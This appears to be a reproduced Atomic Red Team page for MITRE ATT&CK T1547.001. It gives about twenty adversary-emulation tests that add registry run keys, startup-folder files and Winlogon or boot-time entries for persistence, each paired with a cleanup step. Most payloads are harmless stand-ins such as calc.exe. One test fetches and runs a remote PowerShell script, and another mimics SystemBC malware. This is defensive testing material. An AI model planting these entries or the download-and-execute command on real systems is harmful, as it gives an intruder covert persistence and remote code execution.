# Living in the Run Key: Practical Persistence for Red Team Ops

## [**Description from ATT&CK**](https://attack.mitre.org/techniques/T1547/001)

> Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
> 
> The following run keys are created by default on Windows systems:
> 
> * `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run`
>     
> * `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce`
>     
> * `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run`
>     
> * `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce`
>     
> 
> Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx` is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: `reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"` (Citation: Oddvar Moe RunOnceEx Mar 2018)
> 
> Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is `C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup`. The startup folder path for all users is `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp`.
> 
> The following Registry keys can be used to set startup folder items for persistence:
> 
> * `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
>     
> * `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
>     
> * `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
>     
> * `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
>     
> 
> The following Registry keys can control automatic startup of services during boot:
> 
> * `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
>     
> * `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
>     
> * `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices`
>     
> * `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices`
>     
> 
> Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
> 
> * `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`
>     
> * `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`
>     
> 
> Programs listed in the load value of the registry key `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows` run automatically for the currently logged-on user.
> 
> By default, the multistring `BootExecute` value of the registry key `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager` is set to `autocheck autochk *`. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
> 
> Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.

## **Atomic Tests**

* Atomic Test #1 - Reg Key Run
    
* Atomic Test #2 - Reg Key RunOnce
    
* Atomic Test #3 - PowerShell Registry RunOnce
    
* Atomic Test #4 - Suspicious vbs file run from startup Folder
    
* Atomic Test #5 - Suspicious jse file run from startup Folder
    
* Atomic Test #6 - Suspicious bat file run from startup Folder
    
* Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder
    
* Atomic Test #8 - Add persistance via Recycle bin
    
* Atomic Test #9 - SystemBC Malware-as-a-Service Registry
    
* Atomic Test #10 - Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value
    
* Atomic Test #11 - Change Startup Folder - HKCU Modify User Shell Folders Startup Value
    
* Atomic Test #12 - HKCU - Policy Settings Explorer Run Key
    
* Atomic Test #13 - HKLM - Policy Settings Explorer Run Key
    
* Atomic Test #14 - HKLM - Append Command to Winlogon Userinit KEY Value
    
* Atomic Test #15 - HKLM - Modify default System Shell - Winlogon Shell KEY Value
    
* Atomic Test #16 - secedit used to create a Run key in the HKLM Hive
    
* Atomic Test #17 - Modify BootExecute Value
    
* Atomic Test #18 - Allowing custom application to execute during new RDP logon session
    
* Atomic Test #19 - Creating Boot Verification Program Key for application execution during successful boot
    
* Atomic Test #20 - Add persistence via Windows Context Menu
    

## **Atomic Test #1 - Reg Key Run**

Run Key Persistence

Upon successful execution, cmd.exe will modify the registry by adding "Atomic Red Team" to the Run key. Output will be via stdout.

**Supported Platforms:** Windows

**auto\_generated\_guid:** e55be3fd-3521-4610-9d1a-e210e42dcf05

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| command\_to\_execute | Thing to Run | path | C:\\Path\\AtomicRedTeam.exe |

#### **Attack Commands: Run with** `command_prompt`!

```plaintext
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
```

#### **Cleanup Commands:**

```plaintext
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1
```

## **Atomic Test #2 - Reg Key RunOnce**

RunOnce Key Persistence.

Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout.

**Supported Platforms:** Windows

**auto\_generated\_guid:** 554cbd88-cde1-4b56-8168-0be552eed9eb

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| thing\_to\_execute | Thing to Run | path | C:\\Path\\AtomicRedTeam.dll |

#### **Attack Commands: Run with** `command_prompt`! Elevation Required (e.g. root or admin)

```plaintext
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
```

#### **Cleanup Commands:**

```plaintext
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1
```

## **Atomic Test #3 - PowerShell Registry RunOnce**

RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry.

**Supported Platforms:** Windows

**auto\_generated\_guid:** eb44f842-0457-4ddc-9b92-c4caa144ac42

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| thing\_to\_execute | Thing to Run | path | powershell.exe |
| reg\_key\_path | Path to registry key to update | path | HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce |

#### **Attack Commands: Run with** `powershell`! Elevation Required (e.g. root or admin)

```plaintext
$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
```

#### **Cleanup Commands:**

```plaintext
Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
```

## **Atomic Test #4 - Suspicious vbs file run from startup Folder**

vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" folder and will also run when the computer is restarted and the user logs in.

**Supported Platforms:** Windows

**auto\_generated\_guid:** 2cb98256-625e-4da9-9d44-f2e5f90b8bd5

#### **Attack Commands: Run with** `powershell`! Elevation Required (e.g. root or admin)

```plaintext
Copy-Item "$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
```

#### **Cleanup Commands:**

```plaintext
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
```

## **Atomic Test #5 - Suspicious jse file run from startup Folder**

jse files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" folder and will also run when the computer is restarted and the user logs in.

**Supported Platforms:** Windows

**auto\_generated\_guid:** dade9447-791e-4c8f-b04b-3a35855dfa06

#### **Attack Commands: Run with** `powershell`! Elevation Required (e.g. root or admin)

```plaintext
Copy-Item "$PathToAtomicsFolder\T1547.001\src\jsestartup.jse" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\jsestartup.jse" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
```

#### **Cleanup Commands:**

```plaintext
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore
```

## **Atomic Test #6 - Suspicious bat file run from startup Folder**

bat files can be placed in and executed from the startup folder to maintain persistance

Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" folder and will also run when the computer is restarted and the user logs in.

**Supported Platforms:** Windows

**auto\_generated\_guid:** 5b6768e4-44d2-44f0-89da-a01d1430fd5e

#### **Attack Commands: Run with** `powershell`! Elevation Required (e.g. root or admin)

```plaintext
Copy-Item "$PathToAtomicsFolder\T1547.001\src\batstartup.bat" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\batstartup.bat" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
```

#### **Cleanup Commands:**

```plaintext
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore
```

## **Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder**

Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists.

**Supported Platforms:** Windows

**auto\_generated\_guid:** 24e55612-85f6-4bd6-ae74-a73d02e3441d

#### **Attack Commands: Run with** `powershell`! Elevation Required (e.g. root or admin)

```plaintext
$Target = "C:\Windows\System32\calc.exe"
$ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Create = $WScriptShell.CreateShortcut($ShortcutLocation)
$Create.TargetPath = $Target
$Create.Save()
```

#### **Cleanup Commands:**

```plaintext
Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
```

## **Atomic Test #8 - Add persistance via Recycle bin**

Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf) User have to clic on the recycle bin to lauch the payload (here calc)

**Supported Platforms:** Windows

**auto\_generated\_guid:** bda6a3d6-7aa7-4e89-908b-306772e9662f

#### **Attack Commands: Run with** `command_prompt`!

```plaintext
reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f
```

#### **Cleanup Commands:**

```plaintext
reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
```

## **Atomic Test #9 - SystemBC Malware-as-a-Service Registry**

This Atomic will create a registry key called socks5\_powershell for persistance access [https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c](https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c)

**Supported Platforms:** Windows

**auto\_generated\_guid:** 9dc7767b-30c1-4cc4-b999-50cab5e27891

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| reg\_key\_value | Thing to Run | path | powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File |
| reg\_key\_path | Path to registry key to update | path | HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run |

#### **Attack Commands: Run with** `powershell`!

```plaintext
$RunKey = "#{reg_key_path}"
Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
```

#### **Cleanup Commands:**

```plaintext
Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
```

## **Atomic Test #10 - Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value**

This test will modify the HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders -V "Common Startup" value to point to a new startup folder where a payload could be stored to launch at boot. \*successful execution requires system restart

**Supported Platforms:** Windows

**auto\_generated\_guid:** acfef903-7662-447e-a391-9c91c2f00f7b

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| new\_startup\_folder | new startup folder to replace standard one | string | $env:TMP\\atomictest\\ |
| payload | executable to be placed in new startup location | string | C:\\Windows\\System32\\calc.exe |

#### **Attack Commands: Run with** `powershell`! Elevation Required (e.g. root or admin)

```plaintext
New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path  "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "#{new_startup_folder}"
```

#### **Cleanup Commands:**

```plaintext
Set-ItemProperty -Path  "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"
Remove-Item "#{new_startup_folder}" -Recurse -Force
```

## **Atomic Test #11 - Change Startup Folder - HKCU Modify User Shell Folders Startup Value**

This test will modify the HKEY\_CURRENT\_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders -V "Startup" value to point to a new startup folder where a payload could be stored to launch at boot. \*successful execution requires system restart

**Supported Platforms:** Windows

**auto\_generated\_guid:** 8834b65a-f808-4ece-ad7e-2acdf647aafa

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| new\_startup\_folder | new startup folder to replace standard one | string | $env:TMP\\atomictest\\ |
| payload | executable to be placed in new startup location | string | C:\\Windows\\System32\\calc.exe |

#### **Attack Commands: Run with** `powershell`!

```plaintext
New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}"
```

#### **Cleanup Commands:**

```plaintext
Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
Remove-Item "#{new_startup_folder}" -Recurse -Force
```

## **Atomic Test #12 - HKCU - Policy Settings Explorer Run Key**

This test will create a new value under HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run to launch calc.exe on boot. \*Requires reboot

**Supported Platforms:** Windows

**auto\_generated\_guid:** a70faea1-e206-4f6f-8d9a-67379be8f6f1

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| target\_key\_value\_name | registry value to crate on target key | string | atomictest |
| payload | payload to execute | string | C:\\Windows\\System32\\calc.exe |

#### **Attack Commands: Run with** `powershell`! Elevation Required (e.g. root or admin)

```plaintext
if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer")){
  New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
}
if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
  New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
```

#### **Cleanup Commands:**

```plaintext
Remove-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}"
```

## **Atomic Test #13 - HKLM - Policy Settings Explorer Run Key**

This test will create a HKEY\_LOCAL\_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run key value to launch calc.exe on boot. \*Requires reboot

**Supported Platforms:** Windows

**auto\_generated\_guid:** b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| target\_key\_value\_name | registry value to crate on target key | string | atomictest |
| payload | payload to execute | string | C:\\Windows\\System32\\calc.exe |

#### **Attack Commands: Run with** `powershell`! Elevation Required (e.g. root or admin)

```plaintext
if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
  New-Item -ItemType Key -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
```

#### **Cleanup Commands:**

```plaintext
Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}"
```

## **Atomic Test #14 - HKLM - Append Command to Winlogon Userinit KEY Value**

This test will append a command to the HKEY\_LOCAL\_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit value to launch calc.exe on boot.

* Requires reboot
    

**Supported Platforms:** Windows

**auto\_generated\_guid:** f7fab6cc-8ece-4ca7-a0f1-30a22fccd374

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| payload | what to run | string | C:\\Windows\\System32\\calc.exe |

#### **Attack Commands: Run with** `powershell`! Elevation Required (e.g. root or admin)

```plaintext
$oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit-backup" -Value "$oldvalue";
$newvalue = $oldvalue + " #{payload}";
Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$newvalue"
```

#### **Cleanup Commands:**

```plaintext
$oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup');
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$oldvalue";
Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup'
```

## **Atomic Test #15 - HKLM - Modify default System Shell - Winlogon Shell KEY Value**

This test change the default value of HKEY\_LOCAL\_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell from "explorer.exe" to the full path of "C:\\Windows\\explorer.exe" to log a change to the key's default value without breaking boot sequence. An atacker will alternatively replace this with a custom shell.

**Supported Platforms:** Windows

**auto\_generated\_guid:** 1d958c61-09c6-4d9e-b26b-4130314e520e

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| payload | what to run | string | C:\\Windows\\explorer.exe |

#### **Attack Commands: Run with** `powershell`! Elevation Required (e.g. root or admin)

```plaintext
$oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell-backup" -Value "$oldvalue";
$newvalue = $oldvalue + ", #{payload}";
Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$newvalue"
```

#### **Cleanup Commands:**

```plaintext
$oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup');
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$oldvalue";
Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
```

## **Atomic Test #16 - secedit used to create a Run key in the HKLM Hive**

secedit allows to manipulate the HKLM hive of the Windows registry. This test creates a Run key with the keyname calc having calc.exe as the value in the HKLM hive. [Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d)

**Supported Platforms:** Windows

**auto\_generated\_guid:** 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| ini\_file | INI config template | string | $PathToAtomicsFolder\\T1547.001\\src\\regtemplate.ini |
| secedit\_db | Custom secedit db | string | mytemplate.db |

#### **Attack Commands: Run with** `command_prompt`! Elevation Required (e.g. root or admin)

```plaintext
secedit /import /db #{secedit_db} /cfg "#{ini_file}"
secedit /configure /db #{secedit_db}
```

#### **Cleanup Commands:**

```plaintext
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "calc" /f >nul 2>&1
```

## **Atomic Test #17 - Modify BootExecute Value**

This test modifies the BootExecute registry value to "autocheck autoche \*", which can be used to simulate an adversary's attempt to tamper with the system's boot process. Reference - [https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf](https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf) NOTE that by not saving the correct value, you may inhibit your system from booting properly. Only run on a test system. There is a reg export before running the Atomic.

**Supported Platforms:** Windows

**auto\_generated\_guid:** befc2b40-d487-4a5a-8813-c11085fb5672

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| registry\_value | Registry value to set | string | autocheck autoche \* |

#### **Attack Commands: Run with** `powershell`! Elevation Required (e.g. root or admin)

```plaintext
if (!(Test-Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg")) { reg.exe export "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" /y }
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "BootExecute" -Value "#{registry_value}" -Type MultiString
```

#### **Cleanup Commands:**

```plaintext
reg.exe import "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"
Remove-Item -Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" -Force
```

## **Atomic Test #18 - Allowing custom application to execute during new RDP logon session**

When a users logs in to a computer via RDP,Windows will search for the key in HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd registry By default, rdpclip is the value stored. An attacker with administrator privileges can alter the value stored to allow for the custom application to execute during RDP login session.The test will allow running cal rather rdpclip when a user logs in via RDP

**Supported Platforms:** Windows

**auto\_generated\_guid:** b051b3c0-66e7-4a81-916d-e6383bd3a669

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| malicious\_app | Application to be executed during successful RDP session | string | calc |

#### **Attack Commands: Run with** `command_prompt`! Elevation Required (e.g. root or admin)

```plaintext
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" /f /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
```

#### **Cleanup Commands:**

```plaintext
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" /f /v StartupPrograms /t REG_SZ /d "rdpclip"
```

## **Atomic Test #19 - Creating Boot Verification Program Key for application execution during successful boot**

Microsoft allows users to define a custom boot verification program for those situations by creating the registry key “HKLM\\System\\CurrentControlSet\\Control\\BootVerificationProgram” and setting the value of ImagePath to the path of boot verification program.Threat Actor can abuse by creating this registry key and providing a malicious application to be executed during successful boot

**Supported Platforms:** Windows

**auto\_generated\_guid:** 6e1666d5-3f2b-4b9a-80aa-f011322380d4

#### **Inputs:**

| **Name** | **Description** | **Type** | **Default Value** |
| --- | --- | --- | --- |
| malicious\_file | Application to be executed during successful boot | string | C:\\Program Files\\Internet Explorer\\iexplore.exe |

#### **Attack Commands: Run with** `command_prompt`! Elevation Required (e.g. root or admin)

```plaintext
reg add HKLM\System\CurrentControlSet\Control\BootVerificationProgram /v ImagePath /t REG_SZ /d "#{malicious_file}"
```

#### **Cleanup Commands:**

```plaintext
reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram /f
```

## **Atomic Test #20 - Add persistence via Windows Context Menu**

This atomic test add persistence taking advantage of the Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/) User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify).

**Supported Platforms:** Windows

**auto\_generated\_guid:** de47f4a0-2acb-416d-9a6b-cee584a4c4d1

#### **Attack Commands: Run with** `command_prompt`! Elevation Required (e.g. root or admin)

```plaintext
reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command" /ve /t REG_SZ /d "C:\Windows\System32\calc.exe" /f
```

#### **Cleanup Commands:**

```plaintext
reg delete "HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify" /f
```

Ref: [https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md)
